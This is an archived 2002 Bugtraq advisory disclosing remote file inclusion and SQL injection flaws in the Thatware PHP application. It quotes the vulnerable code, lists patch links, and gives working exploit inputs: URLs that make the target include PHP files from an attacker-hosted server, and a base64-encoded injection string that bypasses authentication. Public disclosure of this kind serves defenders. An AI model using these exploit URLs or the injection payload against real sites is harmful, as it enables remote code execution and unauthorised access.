Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Thatware (PHP)

From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 01 Dec 2002 19:35:11 +0100

Informations :
°°°°°°°°°°°°°°
Versions : ? -> 0.3 -> 0.5.3
Website : http://www.thatware.org
Problems :
- Include file
- SQL Injection

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
artlist.php (v0.5.2, 0.5.3) :
-------------------------------------
include $root_path.'thatfile.php';
-------------------------------------


config.php (v? -> 0.3 -> 0.5.3)  :
-------------------------------------
include $root_path."db_settings.php";
-------------------------------------

thatfile.php (v? -> 0.3 -> 0.5.2) :
------------------------------------------------------------------------
if (!IsSet($thatfile)) {
include($root_path."config.php");
if (!IsSet($translation_set)) {
include $root_path."messages.$language.php"; } #Translation module, even for english needed! 
------------------------------------------------------------------------

auth.inc.php (v? -> 0.3 -> 0.5.0) :
------------------------------------------------------------------------
$admintest = 0;
$mod_ok = 0;
$moderator = 0;

if(isset($user)) {
 if (!$thatfile) include("thatfile.php");
 $admin = base64_decode($user);
 $admin = explode(":", $admin);
 if (empty($admin[0]) || empty($admin[2])) exit;
 $aid = $admin[1];
 dbconnect();
$result=mysql_query("select rights from users where uid='$admin[0]' and pass='$admin[2]'"); 
 if(!$result) {
       echo "Oh oh... select from database failed for admin check";
       exit;
 } else {
   list($auth_rights)=mysql_fetch_row($result);
   $auth_rights=explode(",",$auth_rights);
   if (!empty($auth_rights)) {
     $admintest=1;
     if (inarray($auth_rights, "4")||inarray($auth_rights, "1")) {
        $moderator=1;
        $mod_ok=1;
     }
   }
 }
}
------------------------------------------------------------------------



Exploits :
°°°°°°°°°°
v0.5.2, 0.5.3 :
http://[target]/artlist.php?root_path=http://[attacker]/
with
http://[attacker]/thatfile.php


v? -> 0.3 -> 0.5.3 :
http://[target]/config.php?root_path=http://[attacker]/
with
http://[attacker]/db_settings.php


v? -> 0.3 -> 0.5.2 :
http://[target]/thatfile.php?root_path=http://[attacker]/&language=1
with
http://[attacker]/config.php
and
http://[attacker]/messages.1.php


v? -> 0.3 -> 0.5.0 :
http://[target]/[NeedToBeAuth].php?user=JyBPUiAnJz0nOjE6JyBPUiAnJz0n
( base64_decode(JyBPUiAnJz0nOjE6JyBPUiAnJz0n) == ' OR ''=':1:' OR ''=')



Patchs :
°°°°°°°°
0.5.3:
http://www.phpsecure.org/patch/dl.php?id=47
0.5.2:
http://www.phpsecure.org/patch/dl.php?id=51
0.5.0:
http://www.phpsecure.org/patch/dl.php?id=50
0.4.5:
http://www.phpsecure.org/patch/dl.php?id=52
0.4.4:
http://www.phpsecure.org/patch/dl.php?id=49
0.4.3:
http://www.phpsecure.org/patch/dl.php?id=48
0.4.2:
http://www.phpsecure.org/patch/dl.php?id=53
0.4.1:
http://www.phpsecure.org/patch/dl.php?id=54
0.4:
http://www.phpsecure.org/patch/dl.php?id=55
0.3:
http://www.phpsecure.org/patch/dl.php?id=56

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/Thatware.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FThatware.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n


_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
Previous By Date Next
Previous By Thread Next

Current thread: